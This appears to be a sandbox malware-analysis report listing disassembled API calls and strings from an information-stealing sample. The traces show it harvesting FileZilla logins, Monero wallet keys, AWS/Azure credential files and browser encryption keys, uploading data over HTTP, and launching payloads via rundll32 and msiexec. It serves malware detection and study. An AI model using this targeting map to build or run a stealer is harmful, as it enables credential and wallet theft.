                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 23eafcabbd11c85e5d6c5be48e62e8d71ce661ba7974976237c0e559bdafadd5
                        • Instruction ID: 00a179e28ebaf5d8f51b9abed88753c2c8043c2d01718f0aca11211e21f0e346
                        • Opcode Fuzzy Hash: 23eafcabbd11c85e5d6c5be48e62e8d71ce661ba7974976237c0e559bdafadd5
                        • Instruction Fuzzy Hash: 80D14D75912248ABDB44EBF5DD96EEE733AAF14300F41841CF102A6091EF74BE06DB66
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D59F8
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D5A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D5B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E4EA18,00000000,?,00E4A930,00000000,?,006F1A1C), ref: 006D5E71
                        • lstrlen.KERNEL32(00000000), ref: 006D5E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 006D5E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D5E9A
                        • lstrlen.KERNEL32(00000000), ref: 006D5EAF
                        • lstrlen.KERNEL32(00000000), ref: 006D5ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006D5EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 006D5F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006D5F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 006D5F4C
                        • InternetCloseHandle.WININET(00000000), ref: 006D5FB0
                        • InternetCloseHandle.WININET(00000000), ref: 006D5FBD
                        • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D5BF8
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • InternetCloseHandle.WININET(00000000), ref: 006D5FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------$8$H$
                        • API String ID: 874700897-813867249
                        • Opcode ID: 3032a7b42fdbb8209cae139379fd2e81b495fd17982f4786c74a1c4ff5d9b5f8
                        • Instruction ID: b36c1b323e9b6e8553a8308ea89bfe35ed450565af055ad1b42d1911d63fe5fd
                        • Opcode Fuzzy Hash: 3032a7b42fdbb8209cae139379fd2e81b495fd17982f4786c74a1c4ff5d9b5f8
                        • Instruction Fuzzy Hash: 30123E71922258AADB55EBE1DC95FEEB33ABF14700F01419DB10662092EF703E49CF69
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DCF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006DD0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006DD0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD208
                        • lstrcat.KERNEL32(?,006F1478), ref: 006DD217
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD22A
                        • lstrcat.KERNEL32(?,006F147C), ref: 006DD239
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD24C
                        • lstrcat.KERNEL32(?,006F1480), ref: 006DD25B
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD26E
                        • lstrcat.KERNEL32(?,006F1484), ref: 006DD27D
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD290
                        • lstrcat.KERNEL32(?,006F1488), ref: 006DD29F
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD2B2
                        • lstrcat.KERNEL32(?,006F148C), ref: 006DD2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 006DD2D4
                        • lstrcat.KERNEL32(?,006F1490), ref: 006DD2E3
                          • Part of subcall function 006EA820: lstrlen.KERNEL32(006D4F05,?,?,006D4F05,006F0DDE), ref: 006EA82B
                          • Part of subcall function 006EA820: lstrcpy.KERNEL32(006F0DDE,00000000), ref: 006EA885
                        • lstrlen.KERNEL32(?), ref: 006DD32A
                        • lstrlen.KERNEL32(?), ref: 006DD339
                          • Part of subcall function 006EAA70: StrCmpCA.SHLWAPI(00E48FE8,006DA7A7,?,006DA7A7,00E48FE8), ref: 006EAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 006DD3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 7cefed35a263717c39aa19ffbbf244d255e62324a7f3396f8a33acb87d835e5d
                        • Instruction ID: 1d2cd69bbd56a4e569281bb40eed7f6b104318f3246c29ddcd8372107f3a2b4f
                        • Opcode Fuzzy Hash: 7cefed35a263717c39aa19ffbbf244d255e62324a7f3396f8a33acb87d835e5d
                        • Instruction Fuzzy Hash: 20E16E71912248ABDB44EBE1DD96EEE737ABF14300F01415CF106A7092EE34BE06DB66
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • RegOpenKeyExA.ADVAPI32(00000000,00E4B688,00000000,00020019,00000000,006F05B6), ref: 006E83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006E8426
                        • wsprintfA.USER32 ref: 006E8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 006E847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 006E8499
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?$H
                        • API String ID: 3246050789-3047849134
                        • Opcode ID: eeb72b2acea62cb847b578be2079e711f605ab78833ad47f294f5a291c16571f
                        • Instruction ID: 0c1c3e6fd7ca37cf15273943c8e5c8c2b8be69563a8ad5b19438350e77e9b72a
                        • Opcode Fuzzy Hash: eeb72b2acea62cb847b578be2079e711f605ab78833ad47f294f5a291c16571f
                        • Instruction Fuzzy Hash: 39813D719122589FEB64DB91CC81FEAB7BABF08700F0082D9E109A6191DF716F85CF95
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E4CE88,00000000,?,006F144C,00000000,?,?), ref: 006DCA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 006DCA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 006DCA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006DCAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 006DCAD9
                        • StrStrA.SHLWAPI(?,00E4CEA0,006F0B52), ref: 006DCAF7
                        • StrStrA.SHLWAPI(00000000,00E4D008), ref: 006DCB1E
                        • StrStrA.SHLWAPI(?,00E4DBA0,00000000,?,006F1458,00000000,?,00000000,00000000,?,00E48FC8,00000000,?,006F1454,00000000,?), ref: 006DCCA2
                        • StrStrA.SHLWAPI(00000000,00E4DCA0), ref: 006DCCB9
                          • Part of subcall function 006DC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 006DC871
                          • Part of subcall function 006DC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 006DC87C
                        • StrStrA.SHLWAPI(?,00E4DCA0,00000000,?,006F145C,00000000,?,00000000,00E49078), ref: 006DCD5A
                        • StrStrA.SHLWAPI(00000000,00E492A8), ref: 006DCD71
                          • Part of subcall function 006DC820: lstrcat.KERNEL32(?,006F0B46), ref: 006DC943
                          • Part of subcall function 006DC820: lstrcat.KERNEL32(?,006F0B47), ref: 006DC957
                          • Part of subcall function 006DC820: lstrcat.KERNEL32(?,006F0B4E), ref: 006DC978
                        • lstrlen.KERNEL32(00000000), ref: 006DCE44
                        • CloseHandle.KERNEL32(00000000), ref: 006DCE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: f84760af48bbd3fb1defd4bf04e0ff6a37d87af3c62c6bcd7a15f7dd5ab1fe06
                        • Instruction ID: 06c4546cab1ef1f18c94276f1f1b8a3062423a0f92b99a68f138d2481f5d1cf0
                        • Opcode Fuzzy Hash: f84760af48bbd3fb1defd4bf04e0ff6a37d87af3c62c6bcd7a15f7dd5ab1fe06
                        • Instruction Fuzzy Hash: AFE13B71D12248ABDB54EBE1DC91FEEB77AAF14300F01415DF10666192EF307A4ACB6A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID: P$
                        • API String ID: 2001356338-959893791
                        • Opcode ID: b26a6bc4e6654b1bf509ff048edd15d4c049531624285db7ca2fa66b2a34e400
                        • Instruction ID: 7cd0f257fb2ef81cf716c120016a59266ea3e9d8f7e77ee8aa5867f0ee4c694a
                        • Opcode Fuzzy Hash: b26a6bc4e6654b1bf509ff048edd15d4c049531624285db7ca2fa66b2a34e400
                        • Instruction Fuzzy Hash: 8FC1C5B59023489BCB54EF61DC89FEE737ABF54304F00449CE50A67142EA30AE85DFA5
                        APIs
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 006E4DCD
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E492C
                          • Part of subcall function 006E4910: FindFirstFileA.KERNEL32(?,?), ref: 006E4943
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 006E4E59
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FDC), ref: 006E4971
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F0FE0), ref: 006E4987
                          • Part of subcall function 006E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006E4B7D
                          • Part of subcall function 006E4910: FindClose.KERNEL32(000000FF), ref: 006E4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 006E4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 006E4EE5
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E49B0
                          • Part of subcall function 006E4910: StrCmpCA.SHLWAPI(?,006F08D2), ref: 006E49C5
                          • Part of subcall function 006E4910: wsprintfA.USER32 ref: 006E49E2
                          • Part of subcall function 006E4910: PathMatchSpecA.SHLWAPI(?,?), ref: 006E4A1E
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,00E4EA08), ref: 006E4A4A
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,006F0FF8), ref: 006E4A5C
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,?), ref: 006E4A70
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,006F0FFC), ref: 006E4A82
                          • Part of subcall function 006E4910: lstrcat.KERNEL32(?,?), ref: 006E4A96
                          • Part of subcall function 006E4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006E4AAC
                          • Part of subcall function 006E4910: DeleteFileA.KERNEL32(?), ref: 006E4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 3e2e3470007de75603556340ada65818eca8e772ad74b6250c7a94e55ed72c33
                        • Instruction ID: b3dda6b7bc446da6a7c9e1ef926ded793b3c0ab959d0c4dd16454bc92d45a06e
                        • Opcode Fuzzy Hash: 3e2e3470007de75603556340ada65818eca8e772ad74b6250c7a94e55ed72c33
                        • Instruction Fuzzy Hash: F441A5B9A5130867D750F7B0EC47FED733AAB25704F0044987649661C2EEB46BC9CB92
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E31C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E34EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExecuteShell$lstrcpy
                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe$h
                        • API String ID: 2507796910-1549074242
                        • Opcode ID: bfc44734c2e130df57d9b216652b20d12a3cd12d8948cc393d7e4a89d99d60d6
                        • Instruction ID: 458c41b570c2bb0372457f8d1b9813c2516b66045377a7053f345ac2f2d69ede
                        • Opcode Fuzzy Hash: bfc44734c2e130df57d9b216652b20d12a3cd12d8948cc393d7e4a89d99d60d6
                        • Instruction Fuzzy Hash: 66123F718122489ADB55EBE1DC92FEEB73AAF14300F41415DF50666192EF303B4ACF6A
                        APIs
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006E42EC
                        • lstrcat.KERNEL32(?,00E4E038), ref: 006E430B
                        • lstrcat.KERNEL32(?,?), ref: 006E431F
                        • lstrcat.KERNEL32(?,00E4CFF0), ref: 006E4333
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006E8D90: GetFileAttributesA.KERNEL32(00000000,?,006D1B54,?,?,006F564C,?,?,006F0E1F), ref: 006E8D9F
                          • Part of subcall function 006D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006D9D39
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E93C0: GlobalAlloc.KERNEL32(00000000,006E43DD,006E43DD), ref: 006E93D3
                        • StrStrA.SHLWAPI(?,00E4DEA0), ref: 006E43F3
                        • GlobalFree.KERNEL32(?), ref: 006E4512
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9AEF
                          • Part of subcall function 006D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,006D4EEE,00000000,?), ref: 006D9B01
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9B2A
